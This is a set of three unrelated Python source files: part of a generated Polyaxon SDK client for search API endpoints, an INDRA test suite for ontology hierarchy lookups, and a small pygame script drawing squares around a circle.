return self.get_search_with_http_info(owner, uuid, **kwargs) # noqa: E501
def get_search_with_http_info(self, owner, uuid, **kwargs): # noqa: E501
"""Get search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_search_with_http_info(owner, uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str uuid: Uuid identifier of the entity (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Search, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'uuid'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_search`") # noqa: E501
# verify the required parameter 'uuid' is set
if self.api_client.client_side_validation and ('uuid' not in local_var_params or # noqa: E501
local_var_params['uuid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `uuid` when calling `get_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/{uuid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Search', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_search_names(self, owner, **kwargs): # noqa: E501
"""List search names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_search_names(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool no_page: No pagination.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListSearchesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_search_names_with_http_info(owner, **kwargs) # noqa: E501
def list_search_names_with_http_info(self, owner, **kwargs): # noqa: E501
"""List search names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_search_names_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool no_page: No pagination.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListSearchesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query',
'no_page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_search_names" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_search_names`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'no_page' in local_var_params and local_var_params['no_page'] is not None: # noqa: E501
query_params.append(('no_page', local_var_params['no_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/names', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListSearchesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_searches(self, owner, **kwargs): # noqa: E501
"""List searches # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_searches(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool no_page: No pagination.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListSearchesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_searches_with_http_info(owner, **kwargs) # noqa: E501
def list_searches_with_http_info(self, owner, **kwargs): # noqa: E501
"""List searches # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_searches_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool no_page: No pagination.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListSearchesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query',
'no_page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_searches" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_searches`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'no_page' in local_var_params and local_var_params['no_page'] is not None: # noqa: E501
query_params.append(('no_page', local_var_params['no_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListSearchesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_search(self, owner, search_uuid, body, **kwargs): # noqa: E501
"""Patch search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_search(owner, search_uuid, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str search_uuid: UUID (required)
:param V1Search body: Search body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Search
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_search_with_http_info(owner, search_uuid, body, **kwargs) # noqa: E501
def patch_search_with_http_info(self, owner, search_uuid, body, **kwargs): # noqa: E501
"""Patch search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_search_with_http_info(owner, search_uuid, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str search_uuid: UUID (required)
:param V1Search body: Search body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Search, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'search_uuid',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_search`") # noqa: E501
# verify the required parameter 'search_uuid' is set
if self.api_client.client_side_validation and ('search_uuid' not in local_var_params or # noqa: E501
local_var_params['search_uuid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_uuid` when calling `patch_search`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'search_uuid' in local_var_params:
path_params['search.uuid'] = local_var_params['search_uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/{search.uuid}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Search', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_search(self, owner, search_uuid, body, **kwargs): # noqa: E501
"""Update search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_search(owner, search_uuid, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str search_uuid: UUID (required)
:param V1Search body: Search body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Search
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_search_with_http_info(owner, search_uuid, body, **kwargs) # noqa: E501
def update_search_with_http_info(self, owner, search_uuid, body, **kwargs): # noqa: E501
"""Update search # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_search_with_http_info(owner, search_uuid, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str search_uuid: UUID (required)
:param V1Search body: Search body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Search, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'search_uuid',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_search`") # noqa: E501
# verify the required parameter 'search_uuid' is set
if self.api_client.client_side_validation and ('search_uuid' not in local_var_params or # noqa: E501
local_var_params['search_uuid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_uuid` when calling `update_search`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_search`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'search_uuid' in local_var_params:
path_params['search.uuid'] = local_var_params['search_uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/searches/{search.uuid}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Search', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
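# Usage sketch (not generated code): the host, token handling and owner value are
# assumptions based on the standard OpenAPI-generated `Configuration` class.
def _example_list_searches():
    import polyaxon_sdk
    configuration = polyaxon_sdk.Configuration(host="https://cloud.polyaxon.com")
    configuration.api_key['ApiKey'] = 'YOUR_API_TOKEN'
    api_instance = SearchesV1Api(polyaxon_sdk.ApiClient(configuration))
    # Returns a V1ListSearchesResponse; pagination/sort/query kwargs are optional.
    return api_instance.list_searches(owner="acme", limit=10)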
|
py | b410466f2a7d651f3cf5d6c26ee062a436d1088a | from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import os
from copy import deepcopy
from indra.util import unicode_strs
from indra.preassembler.hierarchy_manager import hierarchies, \
HierarchyManager, get_bio_hierarchies, YamlHierarchyManager
from indra.preassembler.make_eidos_hume_ontologies import eidos_ont_url, \
rdf_graph_from_yaml, load_yaml_from_url
ent_hierarchy = hierarchies['entity']
mod_hierarchy = hierarchies['modification']
act_hierarchy = hierarchies['activity']
comp_hierarchy = hierarchies['cellular_component']
eidos_ns = 'https://github.com/clulab/eidos/wiki/JSON-LD/Grounding#'
def test_hierarchy_unicode():
# Test all the hierarchies except the comp_hierarchy, which is an
# RDF graph
assert unicode_strs((ent_hierarchy.isa_closure,
ent_hierarchy.partof_closure))
assert unicode_strs((mod_hierarchy.isa_closure,
mod_hierarchy.partof_closure))
assert unicode_strs((act_hierarchy.isa_closure,
act_hierarchy.partof_closure))
def test_isa_entity():
assert ent_hierarchy.isa('HGNC', '1097', 'FPLX', 'RAF')
def test_isa_entity2():
assert not ent_hierarchy.isa('HGNC', '1097', 'HGNC', 'ARAF')
def test_isa_entity3():
assert not ent_hierarchy.isa('FPLX', 'RAF', 'HGNC', '1097')
def test_partof_entity():
assert ent_hierarchy.partof('FPLX', 'HIF_alpha', 'FPLX', 'HIF')
def test_isa_or_partof_entity():
assert ent_hierarchy.isa_or_partof('HGNC', '9385', 'FPLX', 'AMPK')
def test_partof_entity_not():
assert not ent_hierarchy.partof('FPLX', 'HIF1', 'FPLX', 'HIF_alpha')
def test_isa_mod():
assert mod_hierarchy.isa('INDRA_MODS', 'phosphorylation',
'INDRA_MODS', 'modification')
def test_isa_mod_not():
assert not mod_hierarchy.isa('INDRA_MODS', 'phosphorylation',
'INDRA_MODS', 'ubiquitination')
def test_isa_activity():
assert act_hierarchy.isa('INDRA_ACTIVITIES', 'kinase',
'INDRA_ACTIVITIES', 'activity')
def test_isa_activity_not():
assert not act_hierarchy.isa('INDRA_ACTIVITIES', 'kinase',
'INDRA_ACTIVITIES', 'phosphatase')
def test_partof_comp():
assert comp_hierarchy.partof('INDRA_LOCATIONS', 'cytoplasm',
'INDRA_LOCATIONS', 'cell')
def test_partof_comp_not():
assert not comp_hierarchy.partof('INDRA_LOCATIONS', 'cell',
'INDRA_LOCATIONS', 'cytoplasm')
def test_partof_comp_none():
assert comp_hierarchy.partof('INDRA_LOCATIONS', 'cytoplasm',
'INDRA_LOCATIONS', None)
def test_partof_comp_none_none():
assert comp_hierarchy.partof('INDRA_LOCATIONS', None,
'INDRA_LOCATIONS', None)
def test_partof_comp_none_not():
assert not comp_hierarchy.partof('INDRA_LOCATIONS', None,
'INDRA_LOCATIONS', 'cytoplasm')
def test_get_children():
raf = 'http://identifiers.org/fplx/RAF'
braf = 'http://identifiers.org/hgnc.symbol/BRAF'
mapk = 'http://identifiers.org/fplx/MAPK'
ampk = 'http://identifiers.org/fplx/AMPK'
# Look up RAF
rafs = ent_hierarchy.get_children(raf)
# Should get three family members
assert isinstance(rafs, list), rafs
assert len(rafs) == 3
assert unicode_strs(rafs)
# The lookup of a gene-level entity should not return any additional
# entities
brafs = ent_hierarchy.get_children(braf)
assert isinstance(brafs, list)
assert len(brafs) == 0
assert unicode_strs(brafs)
mapks = ent_hierarchy.get_children(mapk)
assert len(mapks) == 12, mapks
assert unicode_strs(mapks)
# Make sure we can also do this in a case involving both family and complex
# relationships
ampks = ent_hierarchy.get_children(ampk)
assert len(ampks) == 22, ampks
    ag_none = ''
    none_children = ent_hierarchy.get_children(ag_none)
assert isinstance(none_children, list)
assert len(none_children) == 0
def test_mtorc_children():
mtorc1 = 'http://identifiers.org/fplx/mTORC1'
mtorc2 = 'http://identifiers.org/fplx/mTORC2'
ch1 = ent_hierarchy.get_children(mtorc1)
ch2 = ent_hierarchy.get_children(mtorc2)
assert 'http://identifiers.org/hgnc.symbol/RICTOR' not in ch1
assert 'http://identifiers.org/hgnc.symbol/RPTOR' not in ch2
def test_mtorc_get_parents():
rictor = 'http://identifiers.org/hgnc/28611' # RICTOR
p = ent_hierarchy.get_parents(rictor, 'all')
assert len(p) == 1
assert list(p)[0] == 'http://identifiers.org/fplx/mTORC2'
def test_mtorc_transitive_closure():
rictor = 'http://identifiers.org/hgnc/28611' # RICTOR
mtorc2 = 'http://identifiers.org/fplx/mTORC2'
assert (rictor, mtorc2) in ent_hierarchy.partof_closure
def test_mtorc_partof_no_tc():
ent_hierarchy_no_tc = deepcopy(ent_hierarchy)
ent_hierarchy_no_tc.isa_closure = {}
ent_hierarchy_no_tc.partof_closure = {}
assert ent_hierarchy_no_tc.partof('HGNC', '30287', 'FPLX', 'mTORC1')
assert not ent_hierarchy_no_tc.partof('HGNC', '30287', 'FPLX', 'mTORC2')
def test_erk_isa_no_tc():
ent_hierarchy_no_tc = deepcopy(ent_hierarchy)
ent_hierarchy_no_tc.isa_closure = {}
ent_hierarchy_no_tc.partof_closure = {}
assert ent_hierarchy_no_tc.isa('HGNC', '6871', 'FPLX', 'MAPK')
assert not ent_hierarchy_no_tc.isa('HGNC', '6871', 'FPLX', 'JNK')
def test_get_parents():
prkaa1 = 'http://identifiers.org/hgnc/9376' # PRKAA1
ampk = 'http://identifiers.org/fplx/AMPK'
p1 = ent_hierarchy.get_parents(prkaa1, 'all')
assert len(p1) == 8, p1
assert ampk in p1
p2 = ent_hierarchy.get_parents(prkaa1, 'immediate')
assert len(p2) == 7, p2
# This is to make sure we're getting an URI string
assert unicode_strs(p2)
assert ampk not in p2
p3 = ent_hierarchy.get_parents(prkaa1, 'top')
assert len(p3) == 1, p3
assert ampk in p3
def test_chebi_isa():
assert ent_hierarchy.isa('CHEBI', 'CHEBI:87307', 'CHEBI', 'CHEBI:36962')
def test_load_eid_hierarchy():
eidos_ont = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../sources/eidos/eidos_ontology.rdf')
hm = HierarchyManager(eidos_ont, True, True)
assert hm.isa_closure
eidos_isa = lambda a, b: hm.isa('UN', a, 'UN', b)
assert eidos_isa('UN/events/human/conflict',
'UN/events/human')
assert not eidos_isa('UN/events/human/conflict',
'UN/events/human/human_migration')
assert eidos_isa('UN/entities/human/infrastructure',
'UN/entities')
assert eidos_isa('UN/events/natural_disaster/storm',
'UN/events')
assert not eidos_isa('UN/events',
'UN/events/natural/weather/storm')
# Test case where graph is not given
hm = HierarchyManager(None, True, True)
hm.load_from_rdf_file(eidos_ont)
assert eidos_isa('UN/events/natural_disaster/storm',
'UN/events')
# Test loading from string
with open(eidos_ont, 'r') as fh:
hm = HierarchyManager(None, True, True)
hm.load_from_rdf_string(fh.read())
assert eidos_isa('UN/events/natural_disaster/storm',
'UN/events')
# Test loading from Graph
import rdflib
g = rdflib.Graph()
g.parse(eidos_ont, format='nt')
hm = HierarchyManager(None, True, True)
hm.load_from_rdf_graph(g)
assert eidos_isa('UN/events/natural_disaster/storm',
'UN/events')
def test_load_trips_hierarchy():
trips_ont = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../sources/cwms/trips_ontology.rdf')
hm = HierarchyManager(trips_ont, True, True)
assert hm.isa_closure
trips_isa = lambda a, b: hm.isa('CWMS', a, 'CWMS', b)
assert trips_isa('ONT::TRUCK', 'ONT::VEHICLE')
assert not trips_isa('ONT::VEHICLE', 'ONT::TRUCK')
assert trips_isa('ONT::MONEY', 'ONT::PHYS-OBJECT')
assert trips_isa('ONT::TABLE', 'ONT::MANUFACTURED-OBJECT')
def test_load_sofia_hierarchy():
sofia_ont = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../sources/sofia/sofia_ontology.rdf')
hm = HierarchyManager(sofia_ont, True, True)
assert hm.isa_closure
sofia_isa = lambda a, b: hm.isa('SOFIA', a, 'SOFIA', b)
assert sofia_isa('Accessibility/Accessibility', 'Accessibility')
assert not sofia_isa('Movement/Transportation', 'Movement/Human_Migration')
assert sofia_isa('Movement/Human_Migration', 'Movement')
def test_load_hume_hierarchy():
hume_ont = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'../sources/hume/hume_ontology.rdf')
hm = HierarchyManager(hume_ont, True, True)
assert hm.isa_closure
hume_isa = lambda a, b: hm.isa('HUME', a, 'HUME', b)
assert hume_isa('entity/academic_discipline', 'entity')
assert not hume_isa('entity', 'entity/academic_discipline')
assert hume_isa('event/healthcare/human_disease',
'event/healthcare')
def test_same_components():
uri_prkag1 = ent_hierarchy.get_uri('HGNC', '9385') # PRKAG1
uri_ampk = ent_hierarchy.get_uri('FPLX', 'AMPK')
c1 = ent_hierarchy.components[uri_prkag1]
c2 = ent_hierarchy.components[uri_ampk]
assert c1 == c2
def test_bio_hierarchy_pickles():
h1 = get_bio_hierarchies()
h2 = get_bio_hierarchies(from_pickle=False)
for key in h1.keys():
assert len(h1[key].graph) == len(h2[key].graph)
def test_yaml_hm():
yml = load_yaml_from_url(eidos_ont_url)
hm = YamlHierarchyManager(yml, rdf_graph_from_yaml)
entry = 'UN/events/natural_disaster/snowpocalypse'
hm.add_entry(entry)
assert hm.isa('UN', entry, 'UN', '/'.join(entry.split('/')[:-1]))
entry = 'UN/events/galactic/alien_invasion'
hm.add_entry(entry)
assert hm.isa('UN', entry, 'UN', '/'.join(entry.split('/')[:-1]))
assert hm.isa('UN', entry, 'UN', '/'.join(entry.split('/')[:-2]))
|
py | b41048086c82504a76dd08bd9cd02209eee9d469 | import pygame
from pygame.sprite import Sprite
import sys
import numpy as np
val = 150
grey = val,val,val
class Square(Sprite):
def __init__(self, SCREEN, border_colour=grey,center_colour=grey,*groups):
super().__init__(*groups)
# super().__init__(self)
self.SCREEN = SCREEN
self.length = 100
self.width = self.length
self.height = self.width
self.image = pygame.Surface([self.width , self.height])
self.image.fill(border_colour)
self.rect = self.image.get_rect()
self.border_size = 20
self.middleBlock = pygame.Surface([int(self.width-self.border_size), int(self.height-self.border_size)])
self.middleBlock.fill(center_colour)
self.middleBlockRect = self.middleBlock.get_rect()
self.middleBlockRect.centerx = self.rect.centerx
self.middleBlockRect.centery = self.rect.centery
self.image.blit(self.middleBlock, self.middleBlockRect)
def update(self, x,y):
# return super().update(*args)
# self.rect.x = int(x)
# self.rect.y = int(y)
self.rect.centerx = int(x)
self.rect.centery = int(y)
def draw(self):
self.SCREEN.blit(self.image, self.rect)
class White(Square):
def __init__(self, SCREEN, *groups):
border_colour=(255,255,255)
center_colour=255,255,0
super().__init__(SCREEN, border_colour=border_colour, center_colour=center_colour, *groups)
class Black(Square):
def __init__(self, SCREEN,*groups):
border_colour=(0,0,0)
center_colour=255,255,0
super().__init__(SCREEN, border_colour=border_colour, center_colour=center_colour, *groups)
def exit():
pygame.quit()
sys.exit()
class Circle():
def __init__(self, number, radius):
super().__init__()
self.N = number
self.r = radius
self.coords = []
self.calc()
def calc(self):
delta_theta = float(2*np.pi/self.N)
theta = float(0)
colour = True
for i in range(0, self.N):
x = self.r*np.cos(theta)
y = self.r*np.sin(theta)
element = []
element.append(x)
element.append(y)
element.append(colour)
self.coords.append(element)
colour = not colour
theta += delta_theta
print(element)
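# Illustrative sketch (not in the original script): place alternating White/Black squares
# on the Circle coordinates around a given centre; the radius and count are arbitrary.
def draw_circle_of_squares(screen, centre_x, centre_y, number=16, radius=150):
    circle = Circle(number, radius)
    for x, y, is_white in circle.coords:
        square = White(screen) if is_white else Black(screen)
        square.update(centre_x + x, centre_y + y)
        square.draw()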
if __name__ == '__main__':
pygame.init()
width, height = 500,500
size = width, height
# val = 150
# grey = val,val,val
SCREEN = pygame.display.set_mode(size)
# sq = Square(SCREEN)
# wh = White(SCREEN)
bl = Black(SCREEN)
cir = Circle(16, 5)
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_q:
exit()
SCREEN.fill(grey)
# bl.update(width/2, height/2)
# bl.draw()
# pygame.draw.rect(SCREEN, (255,0,0), sq.rect)
pygame.display.flip()
|
